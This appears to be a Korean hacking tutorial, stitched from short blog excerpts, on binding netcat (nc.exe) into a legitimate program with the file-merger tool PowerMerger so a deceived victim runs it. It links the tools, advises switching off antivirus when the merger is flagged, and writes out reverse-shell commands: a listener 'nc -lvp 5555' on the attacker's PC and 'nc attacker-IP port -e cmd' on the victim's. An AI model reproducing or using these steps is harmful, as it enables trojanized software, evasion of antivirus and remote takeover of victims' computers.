이 공격은 NetCat 리버스 커넥션에서 한단계 업그레이드된 방법으로써소셜해킹 , 인간관계적인 해킹을 사용하는 방법입니다. 정상적이고 실행하고싶거나 실행해야하는 프로그램에 공격자의 nc.exe를 병합하여 반강제적으로 NetCat 공격을 감행하는것입니다. 이 공격에 감염되었던 사례가 네이트온과 농협 해킹사건입니다. 이 과정에는 두가지 프로그램이 필요합니다. nc.exe( netcat 프로그램 ) 과 파일병합 프로그램 PowermergerNetCat UNIX/LINUX 용 : http://netcat.sourceforge.net/download.phpWindows 용 : http://www.securityfocus.com/tools/139Powermergerhttp://hsol.tistory.com/664 ..
두가지의 파일을 합쳐놓을(병합)때 필요한 병합프로그램 PowerMerger를 소개합니다. 좋은 곳에 사용하면 유용한 프로그램이지만 악의적인 곳에 사용할 경우 '나쁜' 프로그램이 될 수 있기에가끔 백신에서 잡아내는 모양이지만 바이러스는 없습니다. 단지 악용을 막기위해 잡는것이니 실행이 안되면 백신을 끄고 해보세요. 먼저 프로그램을 실행하면 이와 같은 창이 뜹니다. 첫번째 영역은 적용될 아이콘 파일이고요, *.ico 형식으로 된 파일을 추가 할 수 있습니다. 두번째, 세번째 영역은 합칠 파일 두개를 선택하는 곳입니다.어느 파일이든 확장자가 무엇이든 상관없이 두 파일을 병합할 수 있습니다. Merge! 버튼을 누르면 병합이 완료됩니다. 생성된 파일을 실행 시 합쳐진 두개의 파일이 동시에 실행되는것을 볼 수 있..
1. 공격자PC - cmd - nc.exe 가 위치한 경로로 이동 - nc -lvp 임의의 port ex)nc -lvp 5555 - 리스닝 모드(대기상태) 돌입 2. 피해자 PC - CMD - nc.exe 가 위치한 경로로 이동 - nc 공격자IP port번호 -e cmd